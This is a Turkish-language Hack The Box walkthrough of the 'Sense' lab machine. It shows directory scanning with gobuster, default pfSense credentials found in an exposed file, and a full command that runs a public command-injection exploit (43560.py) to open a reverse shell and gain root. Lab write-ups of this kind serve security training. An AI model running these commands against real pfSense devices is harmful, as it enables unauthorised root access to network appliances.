Hack The Box Sense Makine Çözümü — shaggy

Açıklama: Selam arkadaşlar, Hack the Box platformunda bulunan** ‘Sense’ isimli makinenin **çözümünü sizinle paylaşıyor olacağım. Çözmesi oldukça zevkli olan bu makineyi gelin çözmeye başlayalım. 🍾 🙌 🎉

Öncelikle makinemize bir nmap taraması başlatıyoruz ve web uygulamasının çalıştığını gözlemliyoruz.

Bizi PFSENSE ürünün login ekranı karşılıyor. Logini bypasslamaya çalışsam da başaramadım ve bundan dolayı default credentials aradım.

Kısa bir araştırma sonucunda ilgili sayfadan default bilgileri aldım fakat yine de kızdı sisteme giremiyoruz.

Sonrasında Gobuster aracıyla php, txt ve html uzantılarını kontrol eden dizin taraması uyguluyoruz.

1gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u https://10.10.10.60 -x php,txt,html

system-users.txt dizinini bulup gittiğimizde bize rohit kullanıcısını ve parolasını(default credential) veriyor.

1username: rohitpassword: pfsense

İlgili sistemin arayüzü bizi karşılıyor.

Ardından searchsploit üzerinden ilgili sistemin exploitlerine bakıyoruz. pfSense < 2.1.4 — ‘status_rrd_graph_img.php’ Command Injection modülü bizim işimizi görebilir gibi. Bunun üzerinden devam edelim.

İlgili dosyamızı localimize indirdikten sonra sistem bilgilerini de doldurarak çalıştıralım.

1python3 43560.py --rhost 10.10.10.60 --lhost <IP>--lport 3232 --username rohit --password pfsense

Ardından root kullanıcısına direkt erişebildik. Şimdi bayrağımızı kapıp makineyi bitirebiliriz.

Okuduğunuz için teşekkürler, iyi çalışmalar dilerim. :)